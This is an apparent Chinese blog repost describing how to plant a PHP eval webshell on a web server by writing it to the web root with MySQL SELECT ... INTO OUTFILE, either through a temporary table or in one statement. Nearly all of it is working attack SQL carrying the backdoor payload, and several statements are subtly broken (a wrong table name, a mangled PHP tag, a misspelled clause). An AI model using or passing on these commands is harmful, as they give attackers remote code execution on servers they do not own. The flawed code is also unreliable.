聽說是很老的東西了,學習的時候發現還是很好用的,故學習轉載過來,留備學習。
mysql 導出一句話
- 方法1:網上流行的方法
流程:(1)建表--->(2)插入數據--->(3)select查詢導出
USE test; #調用test數據庫;
DROP TABLE IF EXISTS tmp; # 測試當前數據中是否存在tmp表;
CREATE TABLE tmp(cmd TEXT NOT NULL); # 創建表tmp,且其中的字段為cmd,值不能為空;
INSERT INTO tmp(cmd) VALUES ('<?php @eval($_POST['pass']);?>'); # 向tmp表中cmd字段插入一句話;
SELECT cmd FROM hello INTO OUTFILE '/home/htdocs/ok.php'; # 使用 select 'sth' into outfile '網站物理路徑';
DROP TABLE tmp; # 刪除表tmp。
Drop TABLE IF EXISTS temp; //如果存在temp就刪掉
Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一個cmd字段
Insert INTO temp (cmd) VALUES('<? php eval($_POST[cmd]);?>'); //把一句話木馬插入到temp表
Select cmd from temp into out file 'd:/wwwroot/1.php'; //查詢temp表中的一句話並把結果導入到eval.php
Drop TABLE IF EXISTS temp; //刪除temp
- 方法2:直接select 查詢導出一句話
還有一個思路,就是通過select '一句話' into outfile '網站物理路徑' 即可,具體操作語句如下:
select '<? php eval($_POST[cmd]);?>' into outfile 'd:/phpstudy/wwww/1.php';
這樣做簡潔明了,沒那么多廢話。不知道網上的方法要操作那么復雜(建表-插入數據-最后從表中導出數據),真心復雜!!!
如果誰知道,網上這樣操作的原因,請給我留言分享下!!!